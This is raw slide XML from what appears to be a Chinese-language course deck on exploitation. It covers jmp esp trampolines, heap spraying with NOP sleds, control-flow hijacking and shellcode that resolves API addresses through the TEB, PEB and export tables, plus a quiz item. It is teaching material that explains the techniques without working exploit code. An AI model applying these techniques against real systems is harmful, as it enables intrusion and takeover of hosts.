                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"END of 0x%x\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, address);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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done_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6F008A"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>TRUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a: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a:t>
            </a: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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">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0946"/>
            <a:ext cx="4824536" cy="679738"/>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通过程序运行就可以得到很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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6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esp</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的指令地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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XP</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下有效（没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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ASLR</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10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2E2779C-4759-04C4-2A31-A8FF80980C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793642" y="1155219"/>
            <a:ext cx="2031325"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查找跳板指令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D4440A5C-0613-DFD8-B2C4-F42F009225A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6472232" y="2579404"/>
            <a:ext cx="4826000" cy="3530600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3742869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内存喷洒技术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定义</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909121" cy="428905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内存喷射技术的代表是堆喷洒</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Heap spray</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也称为堆喷洒技术，是在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的前面加上大量的滑板指令（</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slide code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组成一个非常长的注入代码段。</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然后向系统申请大量内存，并且反复用这个注入代码段来填充。这样就使得内存空间被大量的注入代码所占据。攻击者再结合漏洞利用技术，只要使程序跳转到堆中被填充了注入代码的任何一个地址，程序指令就会顺着滑板指令最终执行到</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滑板指令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6" y="1705590"/>
            <a:ext cx="4960962"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滑板指令（</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slide code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是由大量</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NOP(no-operation)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空指令</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x90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填充组成的指令序列，当遇到这些</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指令指针会一个指令接一个指令的执行下去，中间不做任何具体操作，直到“滑”过最后一个滑板指令后，接着执行这些指令后面的其他指令，往往后面接着的是</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代码。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282356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内存喷洒技术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滑板指令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909121" cy="1980735"/>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的正常执行，需要从</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的第一条指令开始。前面加上滑板指令之后，程序跳转后只要命中滑板指令中的任何一个，就可以保证它后面接着的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能成功执行。</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1754006"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类滑板指令</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6" y="1705590"/>
            <a:ext cx="4960962"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随着一些新的攻击技术的出现，滑板指令除了利用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指令填充外，也逐渐开始使用更多的类</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NOP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指令，譬如</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x0C</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0x0D</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回车、换行）等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="721633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44AD8D7-4B27-A8EB-55B9-B29B79C6A130}"/>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下列不可以作为跳板的指令是</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{027415C3-D1DE-7BE4-9ABB-8E3F00F58299}"/>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Jmp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esp</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38CC0988-1A20-DF2C-5F4C-76347BCE44D4}"/>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Mov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esp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jmp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eax</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54FECA2F-5E11-3FB8-ABA8-64F1AF69302C}"/>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Mov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eax</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jmp</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ebp</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655E850-0AFD-1365-7837-D4496946A5DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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7786A13E-92A0-5626-DB59-9D925B61F553}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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26E2D990-7135-A920-CE10-0DD66E71AFB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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矩形: 圆角 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5BB8F1-750E-B1A8-F280-9A72AD023F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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AD0B7063-2A52-14FE-0A52-CB6CB3C15493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>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84679C5D-37A0-9CC3-CC35-60DCDAF1B6A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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BFC2BB75-5DAF-B081-16F8-F7379CC37CB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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FF62AF49-5607-762A-B126-87F89D8B6F7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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A69FEA4A-CF0D-09B4-8F50-45B8BA3299CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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06134222-6EB8-616E-2562-8E6649149A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>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3609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概念</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302839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漏洞利用（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>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危害</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8259"/>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控制流劫持是一种危害性极大的攻击方式，攻击者能够通过它来获取目标主机的控制权，甚至进行提权操作，对目标主机进行全面控制。</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DCB2067A-5DC1-759E-C799-1864F72C41F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910369" y="1708259"/>
            <a:ext cx="4824536" cy="1596078"/>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漏洞利用的核心就是利用程序漏洞劫持进程的控制权，实现控制流劫持，以便执行植入的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或者达到其他的攻击目的。</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417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API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数自搜索技术</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3820277"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API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数硬编址存在的问题</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2750176"/>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前面的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都采用硬编址的方式来调用相应</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函数。首先获取所要使用函数的地址，然后将该地址写入</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从而实现调用。如果系统版本变了，很多函数的地址往往会发生变化，那么调用就会失败。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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414408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通用型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的编写逻辑</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4" y="1929217"/>
            <a:ext cx="4968143" cy="313489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为编写通用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自身就必须具备动态的自搜索所需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函数地址的能力，即</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函数自搜索技术。</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函数自搜索技术分为三步：</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定位</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dll</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定位</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的导出表</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marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>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搜索定位目标函数</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43722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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数自搜索技术</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7FF2FD4A-A54A-A956-6778-56D01CBF1104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="1182099"/>
            <a:ext cx="10359374" cy="518709"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="792310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="矩形 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4835DAC-B47F-2A9D-42B6-20A888F4FB48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="1052513"/>
              <a:ext cx="1510925" cy="79231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40216FC5-70A6-D501-C390-18C86612A9BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="1052513"/>
              <a:ext cx="20122317" cy="79231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endPar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9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2BBC568-1CA8-C0DA-A4B4-B14EAE9D7B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="1958401"/>
            <a:ext cx="10359374" cy="518709"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="437661"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AFD1411-709A-7FC1-9F31-35808D42885F}"/>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03AA8FDB-58F7-5579-BF70-6FDC68F983F5}"/>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的导出表</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC1E6FBB-704F-4DA4-6EB1-B6AAA74DAF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="2729012"/>
            <a:ext cx="10359374" cy="518708"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="437661"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="矩形 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37629905-4BEB-B69D-1403-4952745F329F}"/>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F4378390-4E52-C658-8F91-FD6EBD797488}"/>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搜索定位</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LoadLibraryA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目标函数</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D02888-4A05-7C44-8237-01F4B4012389}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="3505314"/>
            <a:ext cx="10359374" cy="518707"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="437661"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{720C1F86-A12B-C397-8441-7E4ADD4C3D95}"/>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F8F097E8-BBB2-6CE2-73D4-B12B5F3632A5}"/>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调用</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LoadLibrary</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函数加载</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user32.dll</a:t>
              </a:r>
              <a:endPar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8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE12AC25-A14E-28D2-6C88-5701BF6F4A04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="4274503"/>
            <a:ext cx="10359374" cy="518706"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="437661"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="矩形 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23710B4A-5966-6226-AFBA-4223F26EFB05}"/>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653628E-9FD2-9067-F603-A82CF2E1A761}"/>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定位</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user32.dll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的导出表</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="组合 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B36EF86-55B1-4229-A930-4CDC304A5EAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="5016203"/>
            <a:ext cx="10359374" cy="518705"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="437661"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="矩形 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7472E4AA-BE59-BE30-23C3-8F362ED3B4A5}"/>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6</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E289A07E-9812-287F-6D4E-9D8F0CD520BE}"/>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搜索定位</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MessageBoxA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目标函数</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="组合 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73256FDB-0204-F8C5-1848-6DFE877C7F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="5712094"/>
            <a:ext cx="10359374" cy="518704"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="437661"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="矩形 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C094B11D-92C5-2969-848F-9953E1E55A6B}"/>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7</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291B6AED-081C-C5EA-E50F-6D20F2B89ABE}"/>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调用</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MessageBoxA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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36970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一</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US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32.dll</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合 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF2FD4A-A54A-A956-6778-56D01CBF1104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="1182099"/>
            <a:ext cx="10359374" cy="437660"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="437660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="矩形 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4835DAC-B47F-2A9D-42B6-20A888F4FB48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="1052513"/>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40216FC5-70A6-D501-C390-18C86612A9BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="1052513"/>
              <a:ext cx="20122317" cy="437660"/>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首先通过段寄存器</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>FS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在内存中找到当前的线程环境块</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>TEB</a:t>
              </a:r>
              <a:endPar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9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2BBC568-1CA8-C0DA-A4B4-B14EAE9D7B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="1736359"/>
            <a:ext cx="10359374" cy="437661"/>
            <a:chOff x="-10772707" y="1052513"/>
            <a:chExt cx="21633244" cy="437661"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AFD1411-709A-7FC1-9F31-35808D42885F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="1052514"/>
              <a:ext cx="1510925" cy="437660"/>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03AA8FDB-58F7-5579-BF70-6FDC68F983F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="1052513"/>
              <a:ext cx="20122317" cy="43766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线程环境块偏移地址为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x30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的地址存放着指向进程环境块</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>PEB</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的指针</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC1E6FBB-704F-4DA4-6EB1-B6AAA74DAF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="2290620"/>
            <a:ext cx="10359374" cy="885169"/>
            <a:chOff x="-10772707" y="1052512"/>
            <a:chExt cx="21633244" cy="885169"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="矩形 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37629905-4BEB-B69D-1403-4952745F329F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="1052513"/>
              <a:ext cx="1510925" cy="88516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F4378390-4E52-C658-8F91-FD6EBD797488}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="1052512"/>
              <a:ext cx="20122317" cy="88516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进程环境块中偏移地址为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x0c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的地方存放着指向</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>PEB_LDR_DATA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结构体的指针，其中存放着已经被进程装载的动态链接库的信息</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
